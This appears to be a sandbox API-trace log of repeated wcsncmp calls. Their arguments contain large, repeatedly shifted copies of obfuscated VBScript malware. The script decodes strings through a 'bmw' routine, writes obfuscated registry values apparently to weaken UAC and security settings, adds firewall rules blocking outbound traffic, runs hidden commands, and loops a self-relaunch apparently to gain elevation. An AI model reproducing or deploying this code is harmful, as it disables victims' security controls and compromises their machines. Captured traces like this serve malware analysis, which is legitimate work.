0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.029] wcsncmp (_String1="str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.029] wcsncmp (_String1="tr2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.029] wcsncmp (_String1="r2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.029] wcsncmp (_String1="2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0223.029] wcsncmp (_String1="\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 